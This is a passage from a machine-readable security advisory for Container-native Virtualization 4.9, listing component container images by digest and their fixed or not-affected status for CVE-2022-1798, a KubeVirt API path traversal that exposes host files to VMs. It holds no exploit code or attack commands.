"container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", }, product_reference: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", }, product_reference: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", }, product_reference: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", }, product_reference: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", }, product_reference: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", }, product_reference: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", }, product_reference: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", ], known_not_affected: [ "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", 